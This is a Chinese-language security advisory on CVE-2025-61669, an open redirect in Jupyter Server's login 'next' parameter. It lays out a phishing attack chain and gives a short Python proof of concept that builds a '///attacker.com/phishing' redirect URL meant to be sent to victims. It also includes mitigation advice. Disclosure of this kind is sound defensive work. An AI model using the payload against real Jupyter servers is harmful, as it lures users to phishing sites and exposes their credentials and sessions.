IPBUF安全漏洞报告
English
CVE-2025-61669 CVSS 6.1 中危

CVE-2025-61669 Jupyter Server 开放重定向漏洞

披露日期: 2026-05-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-61669
漏洞类型
开放重定向
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Jupyter Server

相关标签

Open RedirectJupyter ServerCWE-601PhishingURL Redirection

漏洞概述

Jupyter Server在2.17.0及之前的版本中存在开放重定向漏洞。由于`LoginFormHandler._redirect_safe()`函数对登录流程中的`next`查询参数验证不足,攻击者可以利用构造的登录URL(如使用`///example.com`)将用户重定向到任意外部恶意域名,从而辅助进行网络钓鱼攻击。该问题已在2.18.0版本中修复。

技术细节

该漏洞源于Jupyter Server登录处理组件中的逻辑缺陷。具体而言,`LoginFormHandler`类中的`_redirect_safe()`方法负责解析用户登录请求中的`next`参数,以实现登录后的页面跳转。由于该函数对参数的校验逻辑不够严谨,未能正确识别和拒绝包含非标准路径前缀的URL。攻击者可利用`///example.com`这种特殊的URL格式绕过原有的同源策略检查。当用户访问经过精心构造的恶意链接并完成身份认证后,应用程序会信任该参数并将用户浏览器重定向至攻击者指定的外部恶意站点。这种利用方式极大地降低了钓鱼攻击的门槛,因为重定向请求源自受信任的Jupyter服务器域名,用户往往难以察觉。

攻击链分析

STEP 1
准备阶段
攻击者确定目标Jupyter Server实例,并准备恶意的重定向目标URL(如钓鱼网站)。
STEP 2
构造链接
攻击者构造包含恶意`next`参数的URL,使用`///`前缀绕过验证,例如:`http://target/login?next=///evil.com`。
STEP 3
诱导访问
攻击者通过电子邮件或即时通讯工具将恶意链接发送给目标用户,诱导其点击。
STEP 4
用户交互
受害用户点击链接,看到正常的Jupyter登录界面,输入用户名和密码进行登录。
STEP 5
执行重定向
服务器验证用户凭证成功后,读取被篡改的`next`参数,将用户浏览器重定向至攻击者控制的恶意网站。
STEP 6
窃取凭据
受害者在恶意网站上被要求再次验证或直接被窃取Session信息,导致账户失陷。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2025-61669: Jupyter Server Open Redirect # This script generates a malicious URL to exploit the unsafe redirect. import urllib.parse def generate_poc(base_url, redirect_target): """ Generates a malicious login URL exploiting the 'next' parameter vulnerability. The '///' prefix bypasses the validation in _redirect_safe(). """ # Vulnerable payload format payload = f"///{redirect_target}" # Construct the full URL full_url = f"{base_url}?next={urllib.parse.quote(payload)}" return full_url if __name__ == "__main__": target = "http://localhost:8888/login" evil_site = "attacker.com/phishing" exploit_url = generate_poc(target, evil_site) print(f"[+] Exploit URL: {exploit_url}") print("[+] Send this URL to a victim. After they log in, they will be redirected to the attacker's site.")

影响范围

Jupyter Server <= 2.17.0

防御指南

临时缓解措施
在官方补丁发布前,管理员应配置反向代理(如Nginx)或WAF,严格校验HTTP Referer头或拦截包含异常`next`参数(如`///`开头)的请求。用户应提高警惕,避免点击来源不明的登录链接,并在登录后确认浏览器地址栏的域名是否发生异常跳转。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表